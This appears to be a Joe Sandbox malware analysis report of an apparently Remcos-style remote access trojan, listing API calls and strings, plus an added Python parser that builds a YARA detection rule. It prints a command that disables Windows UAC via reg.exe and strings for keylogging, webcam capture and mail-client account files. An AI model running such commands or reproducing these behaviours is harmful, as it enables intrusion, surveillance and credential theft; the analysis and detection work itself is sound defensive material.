                                                                                                                                                                                          • Instruction ID: 6f14054266d56a47c19b6834d5440cb0a0620d3bba3e94929321794d2eb63cd6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2841D1B2A00605BFD7349F6CCC49B6ABFA9FB88710F10856BF155DB791E671DA008B81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1234361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,123A50E4), ref: 1234363D
                                                                                                                                                                                            • Part of subcall function 1234361B: RegQueryValueExW.ADVAPI32(?,1233F313,00000000,00000000,?,00000400), ref: 1234365C
                                                                                                                                                                                            • Part of subcall function 1234361B: RegCloseKey.ADVAPI32(?), ref: 12343665
                                                                                                                                                                                            • Part of subcall function 1234BFB7: GetCurrentProcess.KERNEL32(?,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFC8
                                                                                                                                                                                            • Part of subcall function 1234BFB7: IsWow64Process.KERNEL32(00000000,?,?,1233DAAA,WinDir,00000000,00000000), ref: 1234BFCF
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 1234B763
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                          • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                          • API String ID: 3286818993-4246244872
                                                                                                                                                                                          • Opcode ID: a0a195e70e19f37911e2ffc13e7bcc3b4f60af3f9d3e58b5afbbb9a1a7f7d47f
                                                                                                                                                                                          • Instruction ID: 4bd9d132ea1a89a84f551a5f17fa98b2471b40ff57ce4414c75c4b523805af8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0a195e70e19f37911e2ffc13e7bcc3b4f60af3f9d3e58b5afbbb9a1a7f7d47f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2021AD77A002046BDF69AA748C90DFE77AD9F49325F10057DE406E7280FE29BE098360
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrlenW.KERNEL32(?,?,?,?,?,146410DF,?,?,?,00000000), ref: 14641E9A
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrcatW.KERNEL32(?,?), ref: 14641EAC
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EB3
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrlenW.KERNEL32(?,?,146410DF,?,?,?,00000000), ref: 14641EC8
                                                                                                                                                                                            • Part of subcall function 14641E89: lstrcatW.KERNEL32(?,146410DF), ref: 14641ED3
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1464122A
                                                                                                                                                                                            • Part of subcall function 1464173A: _strlen.LIBCMT ref: 14641855
                                                                                                                                                                                            • Part of subcall function 1464173A: _strlen.LIBCMT ref: 14641869
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                           • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                           • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                                                                                                          • Opcode ID: 966d485200a2239398ebe44187cbf1bbefbb202e84cde8a8ac94b099c4be3e75
                                                                                                                                                                                          • Instruction ID: dae16f3efda7ecc6530abdd17d49243dffa4c5060fc256e682acac30af85e974
                                                                                                                                                                                          • Opcode Fuzzy Hash: 966d485200a2239398ebe44187cbf1bbefbb202e84cde8a8ac94b099c4be3e75
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE21A77DE10218ABEB109790EC85FEE7339EF50758F140556F604EB1D0EAB16E81875D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 1233B172
                                                                                                                                                                                          • wsprintfW.USER32 ref: 1233B1F3
                                                                                                                                                                                            • Part of subcall function 1233A636: SetEvent.KERNEL32(?,?,00000000,1233B20A,00000000), ref: 1233A662
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                           • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                           • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EventLocalTimewsprintf
                                                                                                                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                          • API String ID: 1497725170-248792730
                                                                                                                                                                                          • Opcode ID: bd92c863d70edc1c03bde9f74957145220356c093c788fcffcde923185aae8d8
                                                                                                                                                                                          • Instruction ID: 572f19df1fc59faa4015c5f11cc6416a871ef325a5e1068b8d4ab05e8b11d4ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd92c863d70edc1c03bde9f74957145220356c093c788fcffcde923185aae8d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1911B97B400118AACB69DB94DC908FF77BCEE48312B00021EF446A6190FF38BF46C6A4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 1233779B
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 123377AA
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 123377AF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 12337791
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 12337796
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                           • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                           • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                          • API String ID: 2922976086-4183131282
                                                                                                                                                                                          • Opcode ID: 4f594107cc6cc3ddb4122109f47d6d2b27aaa1742590ee73bb47f832f5d4bb26
                                                                                                                                                                                          • Instruction ID: db5f5ab50eadf6b3136fb89ae876f2904eb8e2b12477d547735d22be03a3549e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f594107cc6cc3ddb4122109f47d6d2b27aaa1742590ee73bb47f832f5d4bb26
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F06DB6D401AC7ACB20AAD69C08EEF7F7CEBC2B11F00052AFA08A6144D6306100CAB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Rmc-W5UGP5, xrefs: 123376DA
                                                                                                                                                                                          • C:\Users\Public\Libraries\wkrriuhD.pif, xrefs: 123376C4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                           • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                           • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: C:\Users\Public\Libraries\wkrriuhD.pif$Rmc-W5UGP5
                                                                                                                                                                                          • API String ID: 0-3420714671
                                                                                                                                                                                          • Opcode ID: cd63176604227bbf103403694a5eccd81afbb280b8f62e4011ce23a92dc9dee5
                                                                                                                                                                                          • Instruction ID: 4fb4225256e4544b76e7403321c8a00414b4ce6faf789d92f028006b3c6c33aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: cd63176604227bbf103403694a5eccd81afbb280b8f62e4011ce23a92dc9dee5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F0F0BB691261AFCA0F666448687AC3E6DA7C1783F800A3AE447DA280EB604600C751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,14644AEA,?,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000), ref: 14644B59
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 14644B6C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,14644AEA,?,?,14644A8A,?,14652238,0000000C,14644BBD,00000000,00000000,00000001,14642082), ref: 14644B8F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                           • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                           • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 23e48c31f0012cb9a96a55eba783012b9d87ecda6115084ba1d09dc950a9493d
                                                                                                                                                                                          • Instruction ID: 841ca2c0d54ed72418b633bae9bf1bf6d06afa0cad186d556f9be628957f527c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 23e48c31f0012cb9a96a55eba783012b9d87ecda6115084ba1d09dc950a9493d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73F04F31E00218BBDF219F90DC49F9DBFBDEF64659F284168F905A7250DB319942CA91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,123732EB,?,?,1237328B,?), ref: 1237335A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1237336D
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,123732EB,?,?,1237328B,?), ref: 12373390
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 53849b21566e00baa2081110bd72a81689ba55b1140b6ce15d8a8d0340ef6b7f
                                                                                                                                                                                          • Instruction ID: 233972142650ff92259a38f1f663a9a20d4bc52eb94c199722d1cc451be79bab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53849b21566e00baa2081110bd72a81689ba55b1140b6ce15d8a8d0340ef6b7f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F04475A4111CFBDF119FA0CC49BEDBFB9EF84356F114668F809AA240DB749A40DA90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,123A4EF8,12334E7A,00000001,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335120
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 1233512C
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335137
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335140
                                                                                                                                                                                            • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                          • String ID: KeepAlive | Disabled
                                                                                                                                                                                          • API String ID: 2993684571-305739064
                                                                                                                                                                                          • Opcode ID: 0e21fb6f05a0b5f4f4a832a948e850018fc5b545a4e91a880d209c5fc51787a9
                                                                                                                                                                                          • Instruction ID: e7de4af83b8b696824fa9212f14626e9c555d3fcaf94268b0c32588c5733a3f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e21fb6f05a0b5f4f4a832a948e850018fc5b545a4e91a880d209c5fc51787a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0F0B4B7C543107FEF223B748D49ABE7FADAB46312F000A59F883827A1D9719951CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ($+INF$+NAN$-INF$-NAN$G
                                                                                                                                                                                          • API String ID: 0-2347845670
                                                                                                                                                                                          • Opcode ID: df386413db5f5bc60be4908ccbe3db412de4ebb9e4581173f80f7e4dbf1d03c9
                                                                                                                                                                                          • Instruction ID: 0041924b5d9d70f3b4af34cad832b0d938c96d2f38d4875f295b94107e5b0489
                                                                                                                                                                                          • Opcode Fuzzy Hash: df386413db5f5bc60be4908ccbe3db412de4ebb9e4581173f80f7e4dbf1d03c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58816031D081959BDF228A6888C07AB3F919F56310F1941BFE8D56B3C1CA7D8D09C39B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ($+INF$+NAN$-INF$-NAN$G
                                                                                                                                                                                          • API String ID: 0-2347845670
                                                                                                                                                                                          • Opcode ID: 5defa071b344468966e8f21992e091caac449c0c4bd61bf6e6264df9a7e114d1
                                                                                                                                                                                          • Instruction ID: e6fb385a06b2e9920547bfa33233a82a7c57b8ed9fcdbdb3d0a1a4ef79059717
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5defa071b344468966e8f21992e091caac449c0c4bd61bf6e6264df9a7e114d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB81BD7291021597CB20AF48DA813AB73A1EFA4710F14917FDC856B3C5EB7D8982C79E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5534a7712bd8acbaa51a057818a33d663e07d762aace7220e9a9b443788d6ad2
                                                                                                                                                                                          • Instruction ID: adb7705efc320a77dc1f239db63ed97e721318946ce0c6584634af74f67994ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5534a7712bd8acbaa51a057818a33d663e07d762aace7220e9a9b443788d6ad2
                                                                                                                                                                                          • Instruction Fuzzy Hash: F571C277A002579BCF25CF94C884AEEBBBAEF41764F150329E4926B180D7749945CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,1233D262), ref: 123344C4
                                                                                                                                                                                            • Part of subcall function 12334607: __EH_prolog.LIBCMT ref: 1233460C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prologSleep
                                                                                                                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                                          • API String ID: 3469354165-3547787478
                                                                                                                                                                                          • Opcode ID: a53768b433ec7554020355c2ae302eb382cfee8ed5e3890200f44cc00bed5902
                                                                                                                                                                                          • Instruction ID: a96c744d4f3ecddf100824f8a99b5f224bfe7a2608ea433488ab6e40a0e1c72c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a53768b433ec7554020355c2ae302eb382cfee8ed5e3890200f44cc00bed5902
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD512A7FF043245BD6A6DB34C854ABE37A9EB81752F000628E946876D0DF31AF05C392
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
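Of the entries above, two carry strings worth a signature: the event-handle function whose String ID is "KeepAlive | Disabled" and the Sleep entry whose strings are CloseCamera, FreeFrame, GetFrame and OpenCamera. The GetModuleHandleExW(mscoree.dll) / GetProcAddress(CorExitProcess) / FreeLibrary entry is the MSVC C runtime's process-exit path, and the +INF/+NAN/-INF/-NAN string table is the runtime's floating-point formatting, so both appear in any binary built with that runtime and say nothing about this sample. The Python below is an added example by the editor, not Joe Sandbox or Remcos code: it parses entries in the report's own layout into records, drops an assumed list of runtime strings (CRT_NOISE, the editor's assumption), and writes the remaining strings into a YARA rule. The excerpt it parses is constructed from lines on this page; the rule name is also an assumption.

```python
"""Parse this report's function entries ("APIs"/"Similarity" blocks) into
records, separate C-runtime boilerplate from payload strings, and emit a YARA
rule. Added example by the editor, not Joe Sandbox or Remcos code:
REPORT_EXCERPT is constructed from this report's lines, CRT_NOISE is assumed."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed input: three entries copied from this report.
REPORT_EXCERPT = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,123732EB,?,?,1237328B,?), ref: 1237335A
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1237336D
• FreeLibrary.KERNEL32(00000000,?,?,?,123732EB,?,?,1237328B,?), ref: 12373390
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Uniqueness Score: -1.00%
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,123A4EF8,12334E7A,00000001,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335120
• SetEvent.KERNEL32(?,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 1233512C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335137
• CloseHandle.KERNEL32(?,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?), ref: 12335140
  • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00000000,1233D262), ref: 123344C4
  • Part of subcall function 12334607: __EH_prolog.LIBCMT ref: 1233460C
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
• API String ID: 3469354165-3547787478
Uniqueness Score: -1.00%
"""

# "• Name.MODULE(args), ref: ADDR", optionally inside a "Part of subcall" callee.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
CRT_NOISE = {"CorExitProcess", "mscoree.dll", "+INF", "+NAN", "-INF", "-NAN", "(", "G"}  # MSVC runtime strings (assumption)
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    strings: List[str] = field(default_factory=list)
    api_string_id: Optional[Tuple[str, str]] = None
    uniqueness: Optional[float] = None

    def payload_strings(self) -> List[str]:
        return [s for s in self.strings if s not in CRT_NOISE]

def parse_entries(text: str) -> List[FunctionEntry]:
    """An entry ends at 'Uniqueness Score:'; the next non-blank line starts a new one."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if cur is None:
            cur = FunctionEntry()
            entries.append(cur)
        value = line.split(":", 1)[1].strip() if ":" in line else ""
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif line.startswith("• API ID:"):
            cur.api_id = value
        elif line.startswith("• String ID:"):
            cur.strings = [s for s in value.split("$") if s]  # report joins strings with '$'
        elif line.startswith("• API String ID:"):
            cur.api_string_id = tuple(value.split("-", 1))
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(value.rstrip("%"))
            cur = None
    return entries

def yara_rule(entries: List[FunctionEntry], name: str = "report_payload_strings") -> str:
    """Rule over payload strings; 2 hits required so one generic word cannot fire it alone."""
    wanted = sorted({s for e in entries for s in e.payload_strings()})
    body = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(wanted):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')
        body.append(f'        $s{i} = "{esc}" ascii wide')
    body += ["    condition:", "        2 of them", "}"]
    return "\n".join(body)
```

The parser keys on the report's own markers (the "•" bullets, the "Part of subcall function" prefix, the "$"-joined String ID and the "Uniqueness Score:" terminator), so it can be pointed at a full text export of the report to pivot on API String IDs across entries. The strings are emitted as `ascii wide` because the report does not say whether they are narrow or UTF-16 in the 12330000 dump; the uniqueness score is kept as the parsed float and not interpreted.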

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                                                                                                                                          • Instruction ID: efef15efacd50fd81b4e319406da5ae0a8bbf017acc72d7e1fa5544143dd46c7
